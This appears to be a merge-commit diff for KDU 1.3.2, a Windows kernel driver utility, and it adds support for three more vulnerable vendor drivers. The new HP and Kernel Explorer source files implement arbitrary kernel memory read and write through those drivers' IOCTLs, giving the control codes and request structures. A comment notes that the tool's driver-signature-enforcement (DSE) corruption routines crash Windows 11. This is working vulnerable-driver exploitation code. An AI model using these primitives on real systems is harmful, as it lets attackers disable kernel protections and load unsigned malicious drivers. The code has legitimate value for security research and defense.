Merge pull request #65 from hfiref0x/dev132

v 1.3.2

README.md

@@ -138,6 +138,9 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 31          | Hilscher       | physmem     | Physical Memory Viewer for Windows | Original          | 1.0.0.0                     |  Cert, Name          |
 | 32          | Lenovo         | LDD         | Lenovo Diagnostics Driver for Windows 10 and later | Original          | 1.0.4.0 and below               |  Cert, Name          |
 | 33          | Dell           | pcdsrvc_x64 | Dell PC Doctor                     | Original          | 6.2.2.0                     |                      |
+| 34          | MSI            | winio       | MSI Foundation Service             | WINIO             | Undefined                   |                      |
+| 35          | HP             | EtdSupport  | ETDi Support Driver                | Original          | 18.0 and below              |                      |
+| 36          | Pavel Yosifovich | KExplore  | Kernel Explorer                | Original          | Undefined              |                      |
 
 ###### *At commit time, data maybe inaccurate.
 

Source/Hamakaze/KDU.vcxproj

@@ -142,6 +142,7 @@
     <ClCompile Include="idrv\directio64.cpp" />
     <ClCompile Include="idrv\gmer.cpp" />
     <ClCompile Include="idrv\hilscher.cpp" />
+    <ClCompile Include="idrv\hp.cpp" />
     <ClCompile Include="idrv\kph.cpp" />
     <ClCompile Include="idrv\lenovo.cpp" />
     <ClCompile Include="idrv\lha.cpp" />
@@ -156,6 +157,7 @@
     <ClCompile Include="idrv\rtcore.cpp" />
     <ClCompile Include="idrv\winring0.cpp" />
     <ClCompile Include="idrv\zemana.cpp" />
+    <ClCompile Include="idrv\zodiacon.cpp" />
     <ClCompile Include="ipcsvc.cpp" />
     <ClCompile Include="main.cpp" />
     <ClCompile Include="kduprov.cpp" />
@@ -192,6 +194,7 @@
     <ClInclude Include="idrv\atszio.h" />
     <ClInclude Include="idrv\dbk.h" />
     <ClInclude Include="idrv\hilscher.h" />
+    <ClInclude Include="idrv\hp.h" />
     <ClInclude Include="idrv\ldrsc.h" />
     <ClInclude Include="idrv\dell.h" />
     <ClInclude Include="idrv\directio64.h" />
@@ -210,6 +213,7 @@
     <ClInclude Include="idrv\rtcore.h" />
     <ClInclude Include="idrv\winring0.h" />
     <ClInclude Include="idrv\zemana.h" />
+    <ClInclude Include="idrv\zodiacon.h" />
     <ClInclude Include="ipcsvc.h" />
     <ClInclude Include="shellcode.h" />
     <ClInclude Include="diag.h" />

Source/Hamakaze/KDU.vcxproj.filters

@@ -192,6 +192,12 @@
     <ClCompile Include="sym.cpp">
       <Filter>Source Files</Filter>
     </ClCompile>
+    <ClCompile Include="idrv\hp.cpp">
+      <Filter>Source Files\idrv</Filter>
+    </ClCompile>
+    <ClCompile Include="idrv\zodiacon.cpp">
+      <Filter>Source Files\idrv</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="global.h">
@@ -359,6 +365,12 @@
     <ClInclude Include="sym.h">
       <Filter>Header Files</Filter>
     </ClInclude>
+    <ClInclude Include="idrv\hp.h">
+      <Filter>Source Files\idrv</Filter>
+    </ClInclude>
+    <ClInclude Include="idrv\zodiacon.h">
+      <Filter>Source Files\idrv</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="resource.rc">

Source/Hamakaze/KDU.vcxproj.user

@@ -5,7 +5,7 @@
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-prv 30 -map c:\install\dummy.sys</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-list</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>

Source/Hamakaze/dsefix.cpp

@@ -4,9 +4,9 @@
 *
 *  TITLE:       DSEFIX.CPP
 *
-*  VERSION:     1.31
+*  VERSION:     1.32
 *
-*  DATE:        14 Apr 2023
+*  DATE:        20 May 2023
 *
 *  CI DSE corruption related routines.
 *  Based on DSEFix v1.3
@@ -20,6 +20,18 @@
 
 #include "global.h"
 
+
+/*
+* 
+*  Note:
+* 
+*  Since Windows 11 the entire CiPolicy section of CI.dll is virtual memory write protected.
+*  Attempt to write there will result in a bugcheck.
+*
+*  Take this into account when executing 'dsefix' operations.
+* 
+*/
+
 #ifdef __cplusplus
 extern "C" {
     void BaseShellDSEFix();

Source/Hamakaze/idrv/hp.cpp

@@ -0,0 +1,107 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       HP.CPP
+*
+*  VERSION:     1.32
+*
+*  DATE:        20 May 2022
+*
+*  Hewlett Packard driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/hp.h"
+
+/*
+* HpEtdReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via HP ETD driver.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI HpEtdReadVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes)
+{
+    PBYTE BufferPtr = (PBYTE)Buffer;
+    ULONG_PTR virtAddress = VirtualAddress;
+    ULONG readBytes = 0;
+    HP_VMEM_REQUEST request;
+
+    for (ULONG i = 0; i < NumberOfBytes; i++) {
+
+        RtlSecureZeroMemory(&request, sizeof(request));
+
+        request.Source = virtAddress;
+        request.Granularity = HpByte;
+
+        if (!supCallDriver(DeviceHandle, IOCTL_HP_READ_VMEM,
+            &request, sizeof(request),
+            &request, sizeof(request)))
+        {
+            break;
+        }
+
+        BufferPtr[i] = request.InputOutput.ValueByType.vtByte;
+        virtAddress += sizeof(BYTE);
+        readBytes += sizeof(BYTE);
+    }
+
+    return (readBytes == NumberOfBytes);
+}
+
+/*
+* HpEtdWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via HP ETD driver.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI HpEtdWriteVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes
+)
+{
+    PBYTE BufferPtr = (PBYTE)Buffer;
+
+    ULONG_PTR virtAddress = VirtualAddress;
+    ULONG writeBytes = 0;
+    HP_VMEM_REQUEST request;
+
+    for (ULONG i = 0; i < NumberOfBytes; i++) {
+
+        RtlSecureZeroMemory(&request, sizeof(request));
+
+        request.Source = virtAddress;
+        request.Granularity = HpByte;
+        request.InputOutput.ValueByType.vtByte = BufferPtr[i];
+
+        if (!supCallDriver(DeviceHandle, IOCTL_HP_WRITE_VMEM,
+            &request, sizeof(request),
+            NULL, 0))
+        {
+            break;
+        }
+
+        virtAddress += sizeof(BYTE);
+        writeBytes += sizeof(BYTE);
+    }
+
+    return (writeBytes == NumberOfBytes);
+}

Source/Hamakaze/idrv/hp.h

@@ -0,0 +1,71 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       HP.H
+*
+*  VERSION:     1.32
+*
+*  DATE:        20 May 2023
+*
+*  Hewlett Packard driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//
+// Hewlett Packard interface for ETDi Service Driver.
+//
+
+#define HP_DEVICE_TYPE        (DWORD)0x8000
+
+#define HP_READ_VMEM  (DWORD)0x80F
+#define HP_WRITE_VMEM (DWORD)0x80E 
+
+#define IOCTL_HP_READ_VMEM        \
+    CTL_CODE(HP_DEVICE_TYPE, HP_READ_VMEM, METHOD_BUFFERED, FILE_READ_ACCESS) //0x8000603C
+
+#define IOCTL_HP_WRITE_VMEM       \
+    CTL_CODE(HP_DEVICE_TYPE, HP_WRITE_VMEM, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x80006038
+
+typedef enum _HP_VALUE_GRANULARITY {
+    HpByte = 1,
+    HpWord = 2,
+    HpDword = 4
+} HP_VALUE_GRANULARITY;
+
+typedef struct _HP_VMEM_REQUEST { //sizeof 32
+    HP_VALUE_GRANULARITY Granularity;
+    ULONG Spare0;
+    ULONG_PTR Unused0;
+    ULONG_PTR Source;
+    union {
+        union {
+            BYTE vtByte;
+            WORD vtWord;
+            DWORD vtDword;
+        } ValueByType;
+        DWORD Value;
+    } InputOutput;
+    ULONG Spare1;
+} HP_VMEM_REQUEST, * PHP_VMEM_REQUEST;
+
+_Success_(return != FALSE)
+BOOL WINAPI HpEtdReadVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL WINAPI HpEtdWriteVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes);

Source/Hamakaze/idrv/winio.cpp

@@ -927,6 +927,7 @@ BOOL WINAPI WinIoRegisterDriver(
         g_SpecifyOffset = TRUE;
         break;
 
+    case IDR_MSI_WINIO:
     default:
         g_WinIoMapMemoryRoutine = WinIoMapMemory;
         g_WinIoUnmapMemoryRoutine = WinIoUnmapMemory;

Source/Hamakaze/idrv/zodiacon.cpp

@@ -0,0 +1,64 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       ZODIACON.CPP
+*
+*  VERSION:     1.32
+*
+*  DATE:        20 May 2022
+*
+*  Zodiacon driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/zodiacon.h"
+
+/*
+* KObExpReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via KObExp driver.
+*
+*/
+BOOL WINAPI KObExpReadVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes)
+{
+    return supCallDriver(DeviceHandle, IOCTL_KOBEXP_READ_VMEM,
+        &VirtualAddress,
+        sizeof(VirtualAddress),
+        Buffer,
+        NumberOfBytes);
+}
+
+/*
+* KObExpWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via KObExp driver.
+*
+*/
+BOOL WINAPI KObExpWriteVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes
+)
+{
+    return supCallDriver(DeviceHandle, IOCTL_KOBEXP_WRITE_VMEM,
+        &VirtualAddress,
+        sizeof(VirtualAddress),
+        Buffer,
+        NumberOfBytes);
+}